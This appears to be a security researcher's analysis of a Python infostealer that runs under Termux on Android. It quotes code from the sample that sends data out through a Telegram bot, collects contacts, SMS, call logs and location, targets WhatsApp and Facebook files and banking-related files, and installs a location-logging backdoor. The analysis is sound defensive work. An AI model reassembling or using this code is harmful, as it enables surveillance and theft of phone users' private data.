Infostealer Targeting Android Devices
Infostealers landscape exploded in 2024 and they remain a top threat today. If Windows remains a nice target (read: Attackers' favorite), I spotted an Infostealer targeting Android devices. This sounds logical that attackers pay attention to our beloved mobile devices because all our life is stored on them.
The sample that I found (SHA256: 7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182) received a VT score of 0/64[1]! Undetected! The source code contains comments in Vietnamese. The sample is a Python script. How can you execute Python code on an Android device? Say hello to Termux, your new best friend.
From the documentation: "Termux[2] is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager."
Sounds great to run Python code.
Once Termux is installed, add the Python package:
$ pkg install python
The infostealer is classic and exfiltrate data through a Telegram channel:
def send_telegram(msg): try: url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage" data = {"chat_id": CHAT_ID, "text": msg} requests.post(url, data=data, timeout=10) except: pass
But, how can the malware access Android data? Termux comes with a suite a command-line tools that provide juicy information. For example, termux-contact-list[3] returns a list of contacts stored in the phone in JSON:
[ { "id": 1, "name": "Alice Dupont", "phone_numbers": [ "+32470123456", "+3221234567" ], "emails": [ "[email protected]" ] }, { "id": 2, "name": "Bob Martin", "phone_numbers": [ "+32475123456" ], "emails": [] }, { "id": 3, "name": "Caroline Smith", "phone_numbers": [], "emails": [ "[email protected]", "[email protected]" ] } ]
The infostealer will collect and exfiltrate the following information:
contacts = subprocess.getoutput('termux-contact-list') sms = subprocess.getoutput('termux-sms-list') call_log = subprocess.getoutput('termux-call-log') location = subprocess.getoutput('termux-location')
The malware tries also to exfiltrate data from apps like Facebook and Whatsapp. How? In the Android ecosystem, Termux is running in a sandbox and has access only to its own $HOME directory:
/data/data/com.termux/files/home
But another tools is provided: termux-setup-storage. That one will allow access to the phone storage through a mapping lile:
/storage/emulated/0/<dir>
Note that the victim will be prompted with a dialog prompt asking right to access data. But they’ll do right?
The malware will try to exfiltrate more data:
fb_paths = [ '/storage/emulated/0/Android/data/com.facebook.katana/', '/storage/emulated/0/Facebook/' ] wa_paths = [ '/storage/emulated/0/WhatsApp/Databases/msgstore.db', '/storage/emulated/0/WhatsApp/Databases/wa.db', '/sdcard/WhatsApp/Databases/msgstore.db' ] media_paths = [ '/storage/emulated/0/DCIM/', '/storage/emulated/0/Pictures/', '/storage/emulated/0/Movies/', '/storage/emulated/0/Download/' ]
It will also search for banking related information:
banking_files = [] for root, dirs, files in os.walk('/storage/emulated/0/'): for file in files: if any(keyword in file.lower() for keyword in ['bank', 'atm', 'vietcombank', 'vpbank', 'mbbank', 'acb']): banking_files.append(os.path.join(root, file))
Get device info:
device_model = subprocess.getoutput('getprop ro.product.model') android_version = subprocess.getoutput('getprop ro.build.version.release') device_name = subprocess.getoutput('getprop ro.product.device')
A backdoor will be installed:
def install_backdoor(): try: backdoor_script = ''' import os, time, requests while True: try: os.system("termux-location > /data/data/com.termux/files/home/location.txt") time.sleep(300) except: time.sleep(60) ''' with open('/data/data/com.termux/files/home/backdoor.py', 'w') as f: f.write(backdoor_script) os.system('python3 /data/data/com.termux/files/home/backdoor.py &') except: pass
I just found the infostealer and I don’t know the complete infection path. How was Termux installed? Is it a PoC? But, for sure, Android devices can also be targeted!
[1] https://www.virustotal.com/gui/file/7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182
[2] https://termux.dev/en/
[3] https://wiki.termux.com/wiki/Termux-contact-list
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 27th - Oct 31st 2025 |
Comments